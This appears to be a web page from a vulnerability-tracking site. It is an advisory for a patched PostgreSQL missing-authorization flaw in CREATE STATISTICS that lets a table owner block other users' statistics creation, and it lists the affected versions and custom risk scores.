Primary

Context

PostgreSQL Missing Authorization Vulnerability in CREATE STATISTICS Command Leading to Denial-of-Service

Vulnerability

Patched

A denial-of-service vulnerability has been identified in PostgreSQL versions prior to 18.1, 17.7, 16.11, 15.15, 14.20, and 13.23. The issue arises from missing authorization in the CREATE STATISTICS command, which allows a table owner to disrupt other users' CREATE STATISTICS operations. This is achieved by creating statistics in any schema. If another user with the CREATE privilege later attempts to use the same name for statistics, the operation will fail.

Impact

Exploitation of this vulnerability can cause a denial-of-service condition for users attempting to create statistics, as their operations will fail if a table owner has already used the same name.

Added: Nov 13, 2025, 1:19 PM

Updated: Nov 13, 2025, 1:19 PM

Vulnerability Rating

Custom Algorithm

spread

8.1

impact

2.5

exploitability

4.9

remediation

7.7

relevance

1.0

threat

0.0

urgency

2.9

incentive

1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Vulnerability Rating

Custom Algorithm

spread

8.1

impact

2.5

exploitability

4.9

remediation

7.7

relevance

1.0

threat

0.0

urgency

2.9

incentive

1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

PostgreSQL Missing Authorization Vulnerability in CREATE STATISTICS Command Leading to Denial-of-Service

Vulnerability

Impact

Affected Products

PostgreSQL

CVSS Scores

References

Vulnerability Rating

Vulnerability Rating